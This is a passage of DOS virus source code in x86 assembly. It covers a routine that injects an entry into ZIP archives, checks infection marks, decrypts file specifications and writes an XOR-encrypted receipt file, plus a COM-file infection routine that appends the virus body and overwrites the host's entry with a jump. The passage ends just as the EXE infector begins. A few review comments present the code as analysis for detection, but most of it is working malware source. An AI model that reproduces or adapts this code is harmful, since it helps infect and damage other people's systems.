mov ds:[14h],ax ; Store low-order word of compress...
mov ds:[18h],ax ; Store low-order word of uncompre...
mov ax,[bp-1ah] ; AX = high-order word of filesize
mov ds:[16h],ax ; Store high-order word of compres...
mov ds:[1ah],ax ; Store high-order word of compres...
mov ax,0ch ; AX = filename length (12 bytes)
mov ds:[1ch],ax ; Store filename length (12 bytes)
xor ax,ax ; AX = extra field length, file co...
mov ds:[1eh],ax ; Store extra field length (0 bytes)
mov ds:[20h],ax ; Store file comment length (0 bytes)
mov ds:[22h],ax ; Store disk number start (0 bytes)
mov ds:[24h],ax ; Store internal file attributes
mov ds:[26h],ax ; Store low-order word of external...
mov ds:[28h],ax ; Store high-order word of externa...
mov ax,[bp-18h] ; AX = low-order word of offset of...
mov ds:[2ah],ax ; Store low-order word of relative...
mov ax,[bp-16h] ; AX = high-order word of offset o...
mov ds:[2ch],ax ; Store high-order word of relativ...
mov bx,[bp-08h] ; BX = file handle of ZIP file
mov cx,2eh ; Write forty-six bytes
call write_file
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
lea dx,filename ; DX = offset of filename
nop
mov cx,0ch ; Write twelve bytes
nop
call write_file_
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov ds,ax ; DS = segment of data buffer
mov ax,'KP' ; AX = low-order word of end of ce...
mov ds:[00h],ax ; Store low-order word of end of c...
mov ax,605h ; AX = high-order word of end of c...
mov ds:[02h],ax ; Store high-order word of end of ...
mov bx,[bp-0ah] ; BX = file handle of !#TEMP#!
mov cx,12h ; Read eightteen bytes
mov dx,04h ; DX = offset of end of central di...
call read_file_
mov cx,ds:[14h] ; CX = zipfile comment length
push cx ; Save CX at stack
mov dx,16h ; DX = offset of zipfile comment
call read_file_
mov ax,ds:[08h] ; AX = total number of entries in ...
inc ax ; Increase total number of entries...
mov ds:[08h],ax ; Store total number of entries in...
mov ax,ds:[0ah] ; AX = total number of entries in ...
inc ax ; Increase total number of entries...
mov ds:[0ah],ax ; Store total number of entries in...
mov ax,ds:[0ch] ; AX = low-order word of size of t...
mov dx,ds:[0eh] ; DX = high-order word of size of ...
add ax,3ah ; Add size of central directory fi...
nop
adc dx,00h ; Convert to 32-bit
mov ds:[0ch],ax ; Store low-order word of size of ...
mov ds:[0eh],dx ; Store high-order word of size of...
mov ax,ds:[10h] ; AX = low-order word of offset of...
mov dx,ds:[12h] ; DX = high-order word of offset o...
add ax,2ah ; Add size of local file header to...
nop
adc dx,00h ; Convert to 32-bit
mov bx,[bp-1ah] ; BX = high-order word of filesize
add dx,bx ; Add high-order word of filesize ...
mov bx,[bp-1ch] ; BX = low-order word of filesize
add ax,bx ; Add low-order word of filesize t...
adc dx,00h ; Convert to 32-bit
mov ds:[10h],ax ; Store low-order word of offset o...
mov ds:[12h],dx ; Store high-order word of offset ...
mov bx,[bp-08h] ; BX = file handle of ZIP file
pop cx ; Load CX from stack
add cx,16h ; Add size of end of central direc...
call write_file
mov bx,[bp-14h] ; BX = file handle of CALLFAST.COM
call close_file
lea dx,filename ; DX = offset of filename
nop
call delete_file
jmp call_mark_
test_receipt:
mov ax,[bp-12h] ; AX = found RECEIPT.IVA
or ax,ax ; Didn't found RECEIPT.IVA
jz exam_extra ; Zero? Jump to exam_extra
jmp call_mark_
exam_extra:
mov bx,[bp-08h] ; BX = file handle of ZIP file
mov cx,[bp-22h] ; CX = high-order word of extra field
mov dx,[bp-24h] ; DX = low-order word of extra field
call set_pos_sof_
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov ds,ax ; DS = segment of data buffer
mov es,ax ; ES = segment of data buffer
mov cx,400h ; Read one thousand and twenty-fou...
call read_file
cld ; Clear direction flag
xor si,si ; Zero SI
xor di,di ; Zero DI
lodsw ; AX = word of extra field
cmp ax,1492h ; Found infection mark?
je comp_extra ; Equal? Jump to comp_extra
jmp call_mark_
comp_extra:
lodsw ; AX = word of extra field
cmp ax,1776h ; Found infection mark?
je load_extra ; Equal? Jump to load_extra
jmp call_mark_
load_extra:
lodsw ; AX = 16-bit decryption key
mov dx,ax ; DX = " " "
lodsb ; AL = number of file specifications
xor cx,cx ; Zero CX
mov cl,al ; CL = number of filespecification
push ax ; Save AX at stack
decrypt_next:
push cx ; Save CX at stack
mov cx,07h ; Decryption fourteen bytes
decrypt_spec:
lodsw ; AX = word of encrypted file spec...
xor ax,dx ; Decrypt word of file specification
stosw ; Store word of file specification
loop decrypt_spec
pop cx ; Load CX from stack
loop decrypt_next
mov ax,ds ; AX = segment of data buffer
add ax,40h ; AX = segment of pathname
mov es,ax ; ES = " " "
push ds ; Save DS at stack
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
mov ah,47h ; Get current directory
xor dl,dl ; Default drive
xor si,si ; Zero SI
int 21h
pop ds ; Load DS from stack
mov ax,es ; AX = segment of pathname
add ax,04h ; AX = segment of end of pathname
mov es,ax ; ES = " " " " "
xor di,di ; Zero DI
mov al,'\' ; AL = backslash
stosb ; Store backslash
xor al,al ; AL = zero
stosb ; Store zero
push es ; Save ES at stack
mov ah,2fh ; Get disk transfer area address
int 21h
mov [bp-26h],es ; Store segment of disk transfer a...
mov [bp-28h],bx ; Store offset of disk transfer ar...
pop es ; Load ES from stack
push ds ; Save DS at stack
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+48h
mov ds,ax ; DS = segment of disk transfer area
xor dx,dx ; Zero DX
mov ah,1ah ; Set disk transfer area address
int 21h
lea dx,receipt_iva ; DX = offset of receipt_iva
nop
call create_file
mov bx,ax ; BX = file handle of RECEIPT.IVA
mov [bp-14h],ax ; Store file handle of RECEIPT.IVA
pop ds ; Load DS from stack
pop ax ; Load AX from stack
mov dx,01h ; Don't store backslash
call create_recei
mov bx,[bp-14h] ; BX = file handle of RECEIPT.IVA
call set_pos_sof
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+48h
mov ds,ax ; DS = segment of disk transfer area
mov es,ax ; ES = " " " " "
encrypt_rece:
mov cx,400h ; Read one thousand and twenty-fou...
call read_file
cmp ax,00h ; Read all of the file?
je set_dta_addr ; Equal? Jump to set_dta_addr
push ax ; Save AX at stack
xor dx,dx ; Zero DX
sub dx,ax ; DX = -number of bytes actually read
mov cx,-01h
call set_pos_cfp
pop ax ; Load AX from stack
push ax ; Save AX at stack
mov cx,ax ; CX = number of bytes actually read
xor si,si ; Zero SI
xor di,di ; Zero DI
encrypt_ipt_:
lodsb ; AL = byte of RECEIPT.IVA
xor al,0ffh ; Encrypt byte of RECEIPT.IVA
stosb ; Store encrypted byte of RECEIPT.IVA
loop encrypt_ipt_
pop ax ; Load AX from stack
mov cx,ax ; CX = number of bytes actually read
call write_file
jmp encrypt_rece
set_dta_addr:
call close_file
mov ds,[bp-26h] ; DS = segment of disk transfer area
mov dx,[bp-28h] ; DX = offset of disk transfer area
mov ah,1ah ; Set disk transfer area address
int 21h
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+40h
mov ds,ax ; DS = segment of data buffer
xor dx,dx ; Zero DX
mov ah,3bh ; Set current directory
int 21h
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
lea si,receipt_iva ; SI = offset of receipt_iva
nop
lea di,filename ; DI = offset of filename
nop
mov cx,0dh ; Move thirteen bytes
rep movsb ; Move RECEIPT.IVA to filename
jmp open_filenam
call_mark_:
mov bx,[bp-08h] ; BX = file handle of ZIP file
call infect_mark
mov bx,[bp-08h] ; BX = file handle of ZIP file
call close_file
mov bx,[bp-0ah] ; BX = file handle of !#TEMP#!
call close_file
lea dx,temp_file ; DX = offset of temp_file
nop
call delete_file
inf_zip_exit:
call int24_load
pop es ds di si dx cx bx ax
mov sp,bp ; SP = stack pointer
pop bp ; Load BP from stack
ret ; Return!
endp
;-----------------------------------------------------------------------
; infect_com - append the virus body to a COM host and patch its entry
;
; Analysis note (review): this is the COM-infection routine of a DOS
; virus; the comments describe observable behaviour for detection and
; incident-response purposes.
;
; Expects (inferred from the loads below - confirm in the caller):
;   DS:[00h..02h] = first three bytes of the host file
;   the host file handle already open for the *_file helpers
; Locals: [bp-04h] = low word of host size, later the body offset
;         [bp-02h] = high word of host size
; Writes: cs:[com_or_exe], cs:[origin_code] (3 bytes), the host file.
; Layout left in an infected COM (usable as a detection signature):
;   bytes 0..2 = E9 rel16 jumping to the appended body
;   pad        = 1..16 bytes so the body starts paragraph aligned
;   body       = code_end-code_begin bytes (content after encrypt_copy)
; Hosts are skipped when >= 64 KiB, < 4096 bytes (unless tst_filesize
; is 1) or when size + body would overflow 16 bits.
;-----------------------------------------------------------------------
infect_com proc near ; Infect COM file
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
sub sp,04h ; Reserve two 16-bit locals ([bp-04h], [bp-02h])
mov ah,00h ; 0 = COM executable (infect_exe stores 1 here)
nop
nop
mov cs:[com_or_exe],ah ; Record that the host is a COM file
mov ax,ds:[00h] ; AX = first word of original COM code
mov word ptr cs:[origin_code],ax ; Save bytes 0-1; the JMP stub below overwrites them
mov al,ds:[02h] ; AL = third byte of original COM code
mov cs:[origin_code+02h],al ; Save byte 2 (3 bytes = size of JMP imm16)
call encrypt_copy ; Presumably prepares the encrypted body written below - confirm in encrypt_copy
call set_pos_eof ; Seek to end of host; DX:AX = host size
mov [bp-04h],ax ; Store low-order word of filesize
mov [bp-02h],dx ; Store high-order word of filesize
push ax ; Preserve AX (low word of size) across the flag test
mov ax,cs:[tst_filesize]
cmp ax,01h ; tst_filesize == 1 disables the size checks
pop ax ; POP does not affect flags, so ZF from CMP survives
je calc_buf_seg ; Equal? Skip the size checks
cmp dx,00h ; Host >= 64 KiB? (cannot be a valid COM)
jne inf_com_exit ; Not equal? Leave the host alone
cmp ax,1000h ; Host smaller than 4096 bytes?
jb inf_com_exit ; Below? Leave the host alone (too small)
calc_buf_seg:
add ax,(code_end-code_begin) ; Would size + body exceed 16 bits?
jb inf_com_exit ; JB == JC: carry out of 16 bits -> skip host
; NOTE(review): the 1..16 pad bytes added below are not part of the
; overflow check above, so a host right at the limit can still overflow.
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h ; Paragraphs occupied by the virus code
mov ds,ax ; DS = segment of data buffer right after the virus
mov cx,10h ; CX = 16 (paragraph size)
mov ax,[bp-04h] ; AX = filesize
and ax,0000000000001111b ; AX = filesize mod 16
sub cx,ax ; CX = 16 - (size mod 16): pad of 1..16 bytes, never 0
mov ax,[bp-04h] ; AX = filesize
add ax,cx ; AX = padded size = paragraph-aligned offset of the body
mov [bp-04h],ax ; Store offset of virus within file
call write_file_ ; Append CX pad bytes (source buffer chosen inside write_file_)
mov cx,(code_end-code_begin) ; CX = length of the virus body
call write_file ; Append the body (source chosen inside write_file)
mov al,0e9h ; JMP imm16 (opcode 0e9h)
mov ds:[00h],al ; Build the 3-byte entry stub in the data buffer
mov ax,[bp-04h] ; AX = offset of the body within the host
sub ax,03h ; rel16 = body offset - (3 bytes of the JMP itself)
mov ds:[01h],ax ; Store 16-bit displacement
call set_pos_sof ; Seek back to offset 0 of the host
mov cx,03h ; Write three bytes
call write_file ; Overwrite the original entry bytes with the JMP stub
inf_com_exit:
mov sp,bp ; SP = stack pointer
pop bp ; Load BP from stack
ret ; Return!
endp
infect_exe proc near ; Infect EXE file
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
sub sp,04h ; Correct stack pointer
mov ah,01h ; EXE executable
nop
nop
mov cs:[com_or_exe],ah ; Store EXE executable
call set_pos_eof
mov [bp-04h],ax ; Store low-order word of filesize
mov [bp-02h],dx ; Store high-order word of filesize
and ax,0000000000001111b